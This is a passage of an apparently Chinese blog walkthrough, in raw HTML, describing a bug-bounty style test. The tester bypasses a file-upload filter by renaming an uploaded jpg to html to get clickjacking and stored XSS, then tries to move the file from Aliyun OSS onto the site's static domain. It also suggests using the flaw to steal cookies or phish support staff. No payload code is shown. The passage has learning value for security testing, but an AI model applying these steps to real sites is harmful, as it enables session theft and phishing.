"Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這里用burp抓包，上傳login.jpg，然后修改為login.html：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042250" data-ratio="0.6019766397124887" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCia4uBVo2u037FcPAPLOZh51ybRib3y2ibjbcCAQCv487JsHjbicaK9NRAw/640?wx_fmt=png" data-type="png" data-w="1113" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">F12打開點擊檢查元素，點擊頭像位置找到該路徑：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042249" data-ratio="0.4281183932346723" data-s="300,640" data-type="png" data-w="946" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfC4hibhASmEGaLNkibF0ZDnNf1xeDlfkqZTTBo2nwnLdOTehMCVMlYFOVw/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">訪問該路徑，即為點擊劫持頁面：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042251" data-ratio="0.4994124559341951" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCULhg4J6WppyEbPsicD9H4AYyQtqC41awgeFzuadyER4rcqEic4d9MzYA/640?wx_fmt=png" data-type="png" data-w="851" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這里也可以進行文件上傳xss：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">用burp抓包后，點擊上傳頭像，上傳test.jpg：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042253" data-ratio="0.18231046931407943" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCBiaof5gZdwwkMAPM6hy6zbu5gWafylrdg55FAiaeAg0fhEicyz81G2p7Q/640?wx_fmt=png" data-type="png" data-w="554" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 554px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">然后把請求包發到Repeater重放模塊里，把jpg后綴改成html后綴：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042254" data-ratio="0.5561594202898551" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCrE3vCVkibbP2xpkL79PAdTTPLyCwSM5vmrfqgVgwO6LamvfJ8zTFMRQ/640?wx_fmt=png" data-type="png" data-w="1104" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">Go后，顯示成功上傳，然后訪問這個路徑：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">https://x.x.x.x/open/2021-08-21/w9xzPxJP-test.html，成功彈窗：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042252" data-ratio="0.33545454545454545" data-s="300,640" data-type="png" data-w="1100" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfC2ryWbtC8AiaOiaGP1bnOccdBrsWIbxrpwic2n30KkcHXzJ3ibda1LkXgSg/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這里驗證成功之后，后續其實就可以利用此漏洞進行盜取cookie，釣魚社工等操作，比如上傳盜取cookie的文件然后把路徑發給客服小姐姐等等操作。 可惜這里遺憾的就是最終上傳到的是阿里云的oss上了，那么這里遇到這種情況該怎么解決呢？<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">以下先列出兩種方法，優先用第二種方法，第二種方法的例子是成功的，信息收集yyds。<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">第一種方法：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> 如果遇到了上傳成功后，可是是上傳到像阿里云的oss上，oss傳html，有些雖然上傳之后看不到重寫規則，但可以手動替換站點的靜態服務器說不定也能成功。站點的靜態服務器的域名一般都是static.xxx.com。 所以就像這樣：瀏覽器上的url手動修改：xxx.aliyuncs.com/1.html=> static.xxx.com/1.html<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">比如這里：這里是在https://x.x.x.x/上傳了文件，可是卻上傳到了阿里云的oss上：https://x.oss-cn-x.aliyuncs.com/open/2021-08-21/nW1ZBCUp-test.html<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042256" data-ratio="0.583029197080292" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCtZQ1YzaDxT1UwUqMjGN24Es3hGHZavkasVTjGSvFlqXRBbCwAGRwlg/640?wx_fmt=png" data-type="png" data-w="1096" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這樣其實有的像src可能不收。那么就可以手動替換url：https://x.oss-cn-x.aliyuncs.com/open/2021-08-21/nW1ZBCUp-test.html<br style="outline: 0px;max-width: 100%;overflow-wrap: break-word;color: rgb(81, 81, 81);font-family: "Microsoft Yahei", Simsun;font-size: 14px;text-align: start;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;">變為https://static.xxx.cn/open/2021-08-21/nW1ZBCUp-test.html<br style="outline: 0px;max-width: 100%;overflow-wrap: break-word;color: rgb(81, 81, 81);font-family: "Microsoft Yahei", Simsun;font-size: 14px;text-align: start;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;">https://static.xxx.cn這個就是該站點的靜態服務器。<br style="outline: 0px;max-width: 100%;overflow-wrap: break-word;color: rgb(81, 81, 81);font-family: "Microsoft Yahei", Simsun;font-size: 14px;text-align: start;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;">不過只是說不定可以成功，這里就沒有成功。原因：兩個的HostId不同，即不同的兩臺主機，不同兩個阿里云oss：<br style="outline: 0px;max-width: 100%;overflow-wrap: break-word;color: rgb(81, 81, 81);font-family: "Microsoft Yahei", Simsun;font-size: 14px;text-align: start;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;">訪問該站點的靜態服務器地址，會顯示其HostId，是一個阿里云oss：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042255" data-ratio="0.338475499092559" data-s="300,640" data-type="png" data-w="1102" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCP69U3wHBAQhy9UWzKzREGS6aGkvTx1qfxcoRxSVlPRE39jOz1FYRUA/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">訪問傳上去的oss地址，會顯示其HostId，是另外一個阿里云oss：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042258" data-ratio="0.3227848101265823" data-s="300,640" data-type="png" data-w="1106" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfC61zcqMlHNNclFGtToDhZJ06e4afVRxq23jnUNJiaUc6v7AAoLIIPA9g/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">這兩個不是相同的主機，不是相同的阿里云oss，自然就不行了，所以https://static.xxx.cn/open/2021-08-21/nW1ZBCUp-test.html 就沒有成功<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042260" data-ratio="0.36413540713632203" data-s="300,640" data-type="png" data-w="1093" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCv6Whraaicvichy1qyPJHdoZ29xmtUO9fXkUINh2vIHPfurnWDBuQdEEw/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">而訪問https://x.oss-cn-x.aliyuncs.com/open/2021-08-21/w9xzPxJP-test.html是存在的，而且也成功解析了：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042257" data-ratio="0.23873873873873874" data-s="300,640" data-type="png" data-w="1110" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCOhKz5xcCIYSrZb15ABErpaYsM4ecVgOF6DovhUcE761qRSFXgTDYOQ/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">其實經過信息收集(fofa)還收集到了別的靜態服務器，不過都是不行的：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;">比如：<p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042259" data-ratio="0.4942528735632184" data-s="300,640" data-type="png" data-w="696" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCaYhdlricPDQECmNkjMzrrLRIRh3nJvdk3ic2AyFaAtlnM0ap3QZRwO2g/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042261" data-ratio="0.19289340101522842" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/5ZACCn1bWEziazmT9E8er0HWIz5xKgkfCdyHcRNj0MT7o7hhqibuvHCcIKgEC86I4WVbqb9ouibwAIkJ68acssJLw/640?wx_fmt=png" data-type="png" data-w="788" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.5440000295639038px;white-space: normal;box-sizing: border-box !important;word-wrap: break-word !important;"> <p style="outline: 0px;max-width: 100%;font-family: -apple-system, 